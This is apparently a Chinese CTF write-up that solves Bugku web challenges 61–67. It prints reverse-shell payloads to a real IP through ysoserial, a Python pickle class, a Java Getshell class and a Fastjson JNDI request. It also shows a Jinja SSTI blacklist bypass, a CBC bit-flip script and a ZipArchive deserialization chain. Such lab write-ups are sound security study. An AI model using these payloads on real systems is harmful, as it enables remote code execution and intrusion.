最近刷了一下 Bugku-CTF-web 的61-70题(平台目前只有67),好难好难,全都是知识的盲区。各种代码审计,各种反序列化,各种反弹shell,各种模版注入,各种字符串绕过,可以说是Web安全的精髓。学到了几个奇技淫巧,比如PHP的passthru函数可以回显系统命令的结果,又比如PHP的ZipArchive类可以删除非ZIP文件,再比如fastcoll工具可以生成2个MD5一样的文件,等等。除此之外,最令我热血澎湃的是CBC字节翻转。
ailx10
网络安全优秀回答者
互联网行业 安全攻防员
去咨询
61、ez_java_serialize
下载附件,开始代码审计
ysoserial 可以创建能够在反序列化时执行命令的对象
java -jar ysoserial-all.jar CommonsCollections5 "bash -c 'bash -i >& /dev/tcp/144.34.162.13/6666 0>&1'" > payload.ser
# 测试不行java -jar ysoserial-all.jar CommonsCollections5 "nc -e /bin/bash 144.34.162.13 6666" > payload.ser
# 测试不行(参数顺序问题)java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections5 "nc 144.34.162.13 6666 -e /bin/bash" > payload.ser
# 测试OK将生成的 payload.ser 文件进行 Base64 编码
base64 -w 0 payload.ser > payload.b64再经过URL编码
import urllib.parse# 原始字符串
original_str = "xxx"
# 使用 quote 进行编码
encoded_str = urllib.parse.quote(original_str)
print("URL编码后:", encoded_str)使用Burp重放
反弹shell成功,直接拿到flag
62、聪明的php
代码审计
存在代码执行
passthru 是 PHP 中的一个函数,用于执行外部程序并将其输出直接传递到浏览器。
读取flag
63、Python Pickle Unserializer
网站目录扫描,得到线索
访问/source得到源代码
使用Python进行反弹shell
import pickle
import base64
import subprocessclass Exploit:def __reduce__(self):# 返回一个可调用对象和其参数return (subprocess.call, (["python3","-c",'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("144.34.162.13",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'],))# 创建 payload
exploit = Exploit()
payload = base64.b64encode(pickle.dumps(exploit)).decode()
print(payload)
使用Burp发送请求
反弹shell成功,拿到flag
64、Java Fastjson Unserialize
在HTTP响应头中有线索
下载下来后,进行代码审计,确定是fastjson反序列化
- 启动一个HTTP服务
python3 -m http.server 7777
- 借助marshalsec项目[1],编译一个RMI服务器
mvn clean package -DskipTests
javac Getshell.java编译 class文件,进行反弹shell
// Getshell.java
import java.lang.Runtime;
import java.lang.Process;public class Getshell {static {try {Runtime rt = Runtime.getRuntime();// String[] commands = {"bash", "-c", "bash -i>& /dev/tcp/144.34.162.13/6666 0>&1"}; 这个不行String[] commands = {"nc", "144.34.162.13","6666", "-e","/bin/sh"};Process pc = rt.exec(commands);pc.waitFor();} catch (Exception e) {// do nothing}}
}
- 启动RMI服务器,监听9999端口,并加载远程类
Getshell.class
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://144.34.162.13:7777/#Getshe
ll" 9999
使用Burp构造请求
POST /login HTTP/1.1
Host: 114.67.175.224:17828
Content-Length: 260
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36
Content-type: application/x-www-form-urlencoded
Accept: */*
Origin: http://114.67.175.224:17828
Referer: http://114.67.175.224:17828/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close{"user":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"pwd":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://144.34.162.13:9999/Exploit","autoCommit":true}
}
反弹shell成功,拿到flag
65、CaaS1
代码审计
#!/usr/bin/env python3
from flask import Flask, request, render_template, render_template_string, redirect
import subprocess
import urllibapp = Flask(__name__)def blacklist(inp):blacklist = ['mro','url','join','attr','dict','()','init','import','os','system','lipsum','current_app','globals','subclasses','|','getitem','popen','read','ls','flag.txt','cycler','[]','0','1','2','3','4','5','6','7','8','9','=','+',':','update','config','self','class','%','#']for b in blacklist:if b in inp:return "Blacklisted word!"if len(inp) <= 70:return inpif len(inp) > 70:return "Input too long!"@app.route('/')
def main():return redirect('/generate')@app.route('/generate',methods=['GET','POST'])
def generate_certificate():if request.method == 'GET':return render_template('generate_certificate.html')elif request.method == 'POST':name = blacklist(request.values['name'])teamname = request.values['team_name']return render_template_string(f'<p>Haha! No certificate for {name}</p>')if __name__ == '__main__':app.run(host='0.0.0.0', port=80)
打开网站,是一个POST表单,要求name长度小于70,且需要绕过黑名单,因此需要使用team_name打配合
我连接靶场的时候,一直500报错,但是本地执行,都是OK的
name={{g.pop["__global""s__"].__builtins__.eval(request.form.team_name)}}&team_name=__import__("os").popen("pwd").read()
第二次启动靶场的时候成功了,做这个实验,就要一口气成功,中间有些错误,就会导致环境崩溃
直接拿到flag
name={{g.pop["__global""s__"].__builtins__.eval(request.form.team_name)}}&team_name=__import__("os").popen("cat flag.txt").read()
66、CBC
使用dirsearch目录扫描,得到线索
dirsearch -u "http://114.67.175.224:13834/"
下载线索,是vim产生的.swp文件,使用vim -r可以打开,进行代码审计
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Login Form</title>
<link href="static/css/style.css" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="static/js/jquery.min.js"></script>
<script type="text/javascript">
$(document).ready(function() {$(".username").focus(function() {$(".user-icon").css("left","-48px");});$(".username").blur(function() {$(".user-icon").css("left","0px");});$(".password").focus(function() {$(".pass-icon").css("left","-48px");});$(".password").blur(function() {$(".pass-icon").css("left","0px");});
});
</script>
</head><?php
define("SECRET_KEY", file_get_contents('/root/key'));
define("METHOD", "aes-128-cbc");
session_start();function get_random_iv(){$random_iv='';for($i=0;$i<16;$i++){$random_iv.=chr(rand(1,255));}return $random_iv;
}function login($info){$iv = get_random_iv();$plain = serialize($info);$cipher = openssl_encrypt($plain, METHOD, SECRET_KEY, OPENSSL_RAW_DATA, $iv);$_SESSION['username'] = $info['username'];setcookie("iv", base64_encode($iv));setcookie("cipher", base64_encode($cipher));
}function check_login(){if(isset($_COOKIE['cipher']) && isset($_COOKIE['iv'])){$cipher = base64_decode($_COOKIE['cipher']);$iv = base64_decode($_COOKIE["iv"]);if($plain = openssl_decrypt($cipher, METHOD, SECRET_KEY, OPENSSL_RAW_DATA, $iv)){$info = unserialize($plain) or die("<p>base64_decode('".base64_encode($plain)."') can't unserialize</p>");$_SESSION['username'] = $info['username'];}else{die("ERROR!");}}
}function show_homepage(){if ($_SESSION["username"]==='admin'){echo '<p>Hello admin</p>';echo '<p>Flag is $flag</p>';}else{echo '<p>hello '.$_SESSION['username'].'</p>';echo '<p>Only admin can see flag</p>';}echo '<p><a href="loginout.php">Log out</a></p>';
}if(isset($_POST['username']) && isset($_POST['password'])){$username = (string)$_POST['username'];$password = (string)$_POST['password'];if($username === 'admin'){exit('<p>admin are not allowed to login</p>');}else{$info = array('username'=>$username,'password'=>$password);login($info);show_homepage();}
}else{if(isset($_SESSION["username"])){check_login();show_homepage();}else{echo '<body class="login-body"><div id="wrapper"><div class="user-icon"></div><div class="pass-icon"></div><form name="login-form" class="login-form" action="" method="post"><div class="header"><h1>Login Form</h1><span>Fill out the form below to login to my super awesome imaginary control panel.</span></div><div class="content"><input name="username" type="text" class="input username" value="Username" onfocus="this.value=\'\'" /><input name="password" type="password" class="input password" value="Password" onfocus="this.value=\'\'" /></div><div class="footer"><input type="submit" name="submit" value="Login" class="button" /></div></form></div></body>';}
}
?>
</html>
倒着推理(逼着自己多读几遍代码,逻辑就通顺了):
- 需要进入
show_homepage(),且$_SESSION["username"]==='admin'才能拿到flag - 进入
login($info)或check_login(),可以给$_SESSION["username"]设置内容 - 想要进入上面2个方法,又不能让
$username==='admin'
第一次请求:用户名bdmin ,成功给$_SESSION["username"]赋值
序列化输出 a:2:{s:8:"username";s:5:"bdmin";s:8:"password";s:3:"123";}
<?php
$info = array('username'=>'bdmin','password'=>'123');
echo serialize($info);// 输出 a:2:{s:8:"username";s:5:"bdmin";s:8:"password";s:3:"123";}
CBC分组
a:2:{s:8:"userna
me";s:5:"bdmin";
s:8:"password";s
:3:"123";}将bdmin翻转成admin
<?php$cipher="OHOIQpTEbdNPX6RguHhsprnhpwRHeTv0Kg%2FY9A%2BbucFebWn%2F7Rr3kwsX4SA9ysvdMK4oxKnZx3Bt11NHSVoOxw%3D%3D";
$enc=base64_decode(urldecode($cipher));$enc[9] = chr(ord($enc[9]) ^ ord("b") ^ ord ("a"));
echo base64_encode($enc);
echo "\n";
echo urlencode(base64_encode($enc));
?>
输出新的密文cipher2:
OHOIQpTEbdNPXKRguHhsprnhpwRHeTv0Kg/Y9A+bucFebWn/7Rr3kwsX4SA9ysvdMK4oxKnZx3Bt11NHSVoOxw==
OHOIQpTEbdNPXKRguHhsprnhpwRHeTv0Kg%2FY9A%2BbucFebWn%2F7Rr3kwsX4SA9ysvdMK4oxKnZx3Bt11NHSVoOxw%3D%3D第二次请求:将bdmin改成admin
使用第一次返回的iv和新的密文cipher2:
得到明文的base64编码,解码之后,可以看到已经将bdmin改成admin了
由于上述第二个分组翻转导致第一个分组乱码了,为了保证可以反序列化,需要将第一个分组所有字符(被破坏的明文),全部进行翻转。这里iv是密文,badtext是被破坏的明文,网上很多博客写这里的时候都会误导。
<?php
$badtext = "Y2vl1b14EuQ+77iIbHG8JG1lIjtzOjU6ImFkbWluIjtzOjg6InBhc3N3b3JkIjtzOjM6IjEyMyI7fQ==";
$iv = "ZdbmPjquAUFiKQhEB3JdtA%3D%3D";$badtext = base64_decode($badtext);
$iv=base64_decode(urldecode($iv));
$cleartext = 'a:2:{s:8:"username";s:5:"bdmin";s:8:"password";s:3:"123";}';
$newiv = '';
for ($i=0;$i<16;$i++){$newiv=$newiv.chr(ord($iv[$i]) ^ ord($badtext[$i]) ^ ord ($cleartext[$i]));
}
echo urlencode(base64_encode($newiv));
?>
输出新的iv(破坏密文输入,控制明文输出):
Z4cx0fylKZ1m5MW%2FDnGP8Q%3D%3D第三次请求:解决明文乱码无法反序列化问题
使用新的iv和密文cipher2,成功拿到flag
67、noteasytrick
直接代码审计
第一步:利用ZipArchive反序列化删除文件./sandbox/lock.lock
<?phpclass Jesen {public $filename;public $content;public $me;
}$j1 = new Jesen();
$j1->me = new ZipArchive();
$j1->filename = "./sandbox/lock.lock";
$j1->content = ZipArchive::OVERWRITE;var_dump(serialize($j1));
输出:
O:5:"Jesen":3:{s:8:"filename";s:19:"./sandbox/lock.lock";s:7:"content";i:8;s:2:"me";O:10:"ZipArchive":6:{s:6:"lastId";i:-1;s:6:"status";i:0;s:9:"statusSys";i:0;s:8:"numFiles";i:0;s:8:"filename";s:0:"";s:7:"comment";s:0:"";}}通过数组绕过MD5检查
当有s:6:"lastId";i:-1;时,发现无法删除 ./sandbox/lock.lock 文件
删掉之后,成功删除 ./sandbox/lock.lock 文件
第二步:使用fastcoll(github上有源码,make编译一下就好了)制造好2个md5一样的文件,内容是:
注意前30个字符是可读的./../../../../../../../../flag
对这2个二进制文件进行URL编码,并验证这2个文件的MD5值是否相等
from urllib.parse import quote_from_bytes
import hashlibdef calculate_md5(file_path):""" 计算文件的 MD5 哈希值 """hash_md5 = hashlib.md5()with open(file_path, 'rb') as f:for chunk in iter(lambda: f.read(1024), b''):hash_md5.update(chunk)return hash_md5.hexdigest()def compare_files(file1_path, file2_path):""" 比较两个文件的 MD5 哈希值是否一致 """# 计算第一个文件的 MD5 哈希值md5_file1 = calculate_md5(file1_path)# 计算第二个文件的 MD5 哈希值md5_file2 = calculate_md5(file2_path)# 比较两个哈希值if md5_file1 == md5_file2:print(f"文件 {file1_path} 和 {file2_path} 的内容一致 (MD5: {md5_file1})")else:print(f"文件 {file1_path} 和 {file2_path} 的内容不一致")print(f"{file1_path} 的 MD5: {md5_file1}")print(f"{file2_path} 的 MD5: {md5_file2}")def read_and_url_encode(file_path):""" 读取文件内容并进行 URL 编码 """with open(file_path, 'rb') as file:content = file.read()# 使用 quote_from_bytes 对二进制数据进行 URL 编码encoded_content = quote_from_bytes(content)return encoded_contentdef main():file1_path = 'a1.txt'file2_path = 'a2.txt'# 读取并编码第一个文件encoded_content1 = read_and_url_encode(file1_path)print(f"文件 {file1_path} 的 URL 编码内容:")print(encoded_content1)# 读取并编码第二个文件encoded_content2 = read_and_url_encode(file2_path)print(f"文件 {file2_path} 的 URL 编码内容:")print(encoded_content2)# 比较这2个文件的MD5值compare_files(file1_path, file2_path)if __name__ == "__main__":main()输出内容如下:
文件 a1.txt 的 URL 编码内容:
./../../../../../../../../flag%0A%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%F1z%D8%EAj%E2%B6%1D%3BC%DC%E5%5B%8Az%F0%1D%F1%FB%D2%CF%82j_%2B%86%3C-%C7%A8%13%25%90%BB%CC%02%BE%B6%0A%B1G%26%C4%FB%0C.%3Er%01%5D%29%EC%AC%C4%B5%2A%DBbep6%A5%D0%EE8K%FC%0D%FF%0D%FD%3B%7FN%7D%0A%27%D0%8AW%2AX%F4%29%16%7D%C0Y%D5%9B%F3%C0%CCY%7D%1E%89Q%16%E2%29%F7R%90_W%B5%0F%91%B9%83%E6%AE%FF%D0%5B%8F%BF%D5%1F%BF%91%9Do%90%DF%1F%C6文件 a2.txt 的 URL 编码内容:
./../../../../../../../../flag%0A%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%F1z%D8%EAj%E2%B6%1D%3BC%DC%E5%5B%8Az%F0%1D%F1%FBR%CF%82j_%2B%86%3C-%C7%A8%13%25%90%BB%CC%02%BE%B6%0A%B1G%26%C4%FB%0C%AE%3Er%01%5D%29%EC%AC%C4%B5%2A%DBbe%F06%A5%D0%EE8K%FC%0D%FF%0D%FD%3B%7FN%7D%0A%27%D0%8AW%2AX%F4%A9%16%7D%C0Y%D5%9B%F3%C0%CCY%7D%1E%89Q%16%E2%29%F7R%90_W%B5%0F%919%83%E6%AE%FF%D0%5B%8F%BF%D5%1F%BF%91%9D%EF%90%DF%1F%C6文件 a1.txt 和 a2.txt 的内容一致 (MD5: c554302c2bc77da0c3915181f57d118e)这里a1对应a,a2对应b,c的话就是简单的Jesen对象序列化
<?phpclass Jesen {public $filename;public $content;public $me;
}$j2 = new Jesen();var_dump(serialize($j2));
输出:
O:5:"Jesen":3:{s:8:"filename";N;s:7:"content";N;s:2:"me";N;}最后使用Burp构造请求,直接拿到flag
参考
- ^marshalsec https://github.com/mbechler/marshalsec
)
)
|机器学习朴素贝叶斯方法进阶-CountVectorizer文本处理简单测试)
